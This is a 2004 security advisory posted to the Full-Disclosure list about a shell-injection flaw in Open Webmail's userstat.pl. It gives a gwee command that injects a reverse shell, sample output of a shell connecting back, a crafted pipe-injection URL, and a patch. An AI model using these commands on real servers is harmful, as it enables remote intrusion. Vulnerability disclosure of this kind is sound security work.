From michel@cycom.se Sun May 9 21:33:20 2004 From: Michel Blomgren To: full-disclosure@lists.netsys.com Date: Mon, 10 May 2004 01:28:41 +0200 Subject: [Full-Disclosure] CSA-200402-1: Previous Open Webmail vulnerability is exploitable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cycom AB Security Advisory CSA-200402-1 www.cycom.se Advisory: Previous Open Webmail vulnerability is exploitable Date: Sat Feb 21 15:18:21 CET 2004, updated: Thu May 6 10:37:29 CEST 2004 Application: Open Webmail 2.20, 2.21 and 2.30 (and -current) Vulnerability: Remote arbitrary command exection Availability: http://openwebmail.org Platforms: OS independent (multiple *NIXes) Status: Patch is available (included in this advisory) Reference: CSA-200402-1 Author: Michel Blomgren SYNOPSIS "Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail." -- http://openwebmail.org VULNERABILITY Nullbyte and Syscalls discovered that a near obsolete script named userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't filter out dangerous *nix shell characters from the "loginname" parameter. The "loginname" parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, "nobody" or "www", e.g.). DISCOVERY The vulnerability was found by Nullbyte and Syscalls of UDC. EXPLOIT At least 2 exploits are in circulation, one by Nullbyte and one re-write by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is limited (read the "FIX" section below). You can use Gwee (generic web exploitation engine) available from http://cycom.se/dl/gwee to exploit using the following command: $ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl -L Use built-in TCP listener (like "nc -l"). -l The host or IP address to have the reverse shellcode connect back to. -p The port to have the reverse shellcode connect back to. For example... $ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi !!! ` ___ ' - (0 0) - - -----oOo(_)oOo---------------------------------------- ----- --- -- - - gwee 1.21 - generic web exploitation engine Copyright (C) 2004 Michel Blomgren Perl and Python shellcode by Sabu Acknowledgements: Sabu and Nullbyte [i] target: localhost [i] using POST requests to send data [i] shellcode: Sabu's reverse Perl shellcode (portable) [i] injection method: perl -e [+] resolving localhost into an ip address [i] shellcode will connect to 127.0.0.1 on port 12345 [i] will listen for incoming connection on port 12345 [+] attempting to inject shellcode into target [+] listening for incoming connection on port 12345, timeout is 30 seconds [i] got connection from 127.0.0.1:33670 Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown 12:05:52 up 3:56, 7 users, load average: 0.08, 0.02, 0.01 FIX Cycom AB has provided a diff patch that will fix the issue. Ken Girrard wrote and published an advisory long before this one. He provided a patch with his advisory which results in userstat.pl still being vulnerable to remote arbitrary command execution, this patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30 (5.8MB). Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter out spaces and tabs, which makes it impossible to pass arguments to commands an attacker would want to execute. Nevertheless, it's still possible to execute commands without arguments. An example of such an attack would be an attacker that has write access to the box using e.g. FTP and uploads a reverse shellcode, marks it executable and enters the absolute path to it in a crafted URL like this one for example: http://target/cgi-bin/openwebmail/userstat.pl&loginname=%7C/home/fu/bar Our patch follows... - ---- - --- userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100 +++ userstat.pl 2004-02-21 18:05:16.000000000 +0100 @@ -52,6 +52,9 @@ my $html=qq||. qq|_TEXT_|; +# filter out dangerous characters +$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g; + if ($user ne "") { my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`; if ($status =~ /has no mail/) { - ---- Enter cgi-bin/openwebmail/ and run: $ patch -i owm.patch ACKNOWLEDGMENTS I would like to thank the following people: Sabu, Nullbyte and Syscalls. ABOUT CYCOM AB Cycom AB is a newly started firm specializing in information security services (penetration testing, risk assessment, source code review, disaster/incident management and education). Visit us at www.cycom.se. - -- Michel Blomgren Cycom AB http://www.cycom.se ______________________________________________ PGP: http://www.cycom.se/misc/pubkeymichel.asc 886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQFAnr6po/EpQxAcGPoRAudxAJ981KZ3PAq1mTH2Fbcbnu1ZvlvzAACfdV0h 0fzjuRdQkaua1yEJptqFyU4= =tY6l -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html